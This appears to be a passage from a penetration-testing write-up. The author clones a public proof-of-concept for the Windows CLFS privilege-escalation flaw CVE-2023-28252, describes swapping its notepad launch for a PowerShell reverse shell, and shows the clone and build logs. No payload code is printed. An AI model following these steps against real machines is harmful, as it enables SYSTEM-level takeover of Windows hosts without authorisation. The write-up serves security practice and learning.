CVE-2023-28252


PS c:\Users\tacticalgator\source\repos> git clone https://github.com/fortra/CVE-2023-28252
Cloning into 'CVE-2023-28252'...
remote: Enumerating objects: 264, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 264 (delta 0), reused 0 (delta 0), pack-reused 261
Receiving objects: 100% (264/264), 53.45 MiB | 10.59 MiB/s
Receiving objects: 100% (264/264), 55.19 MiB | 7.92 MiB/s, done.
Resolving deltas: 100% (74/74), done.

Downloading the exploit package

The PoC uses the strcmp function to check that it is running with SYSTEM privileges, and then launches notepad.exe. This part needs to be modified, as I need to obtain a shell session.

Generating a PowerShell reverse shell via revshells.com

Replacing it with a PowerShell reverse shell payload

Build started...
1>------ Build started: Project: clfs_eop, Configuration: Release x64 ------
1>clfs_eop.cpp
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(617,9): warning C4477: 'printf' : format string '% p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64'
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1449,11): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64'
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1465,24): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1471,24): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size
1>LINK : /LTCG specified but no code generation required; remove /LTCG from the link command line to improve linker performance
1>clfs_eop.vcxproj -> c:\Users\tacticalgator\source\repos\CVE-2023-28252\x64\Release\clfs_eop.exe
1>Done building project "clfs_eop.vcxproj".
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========

Build complete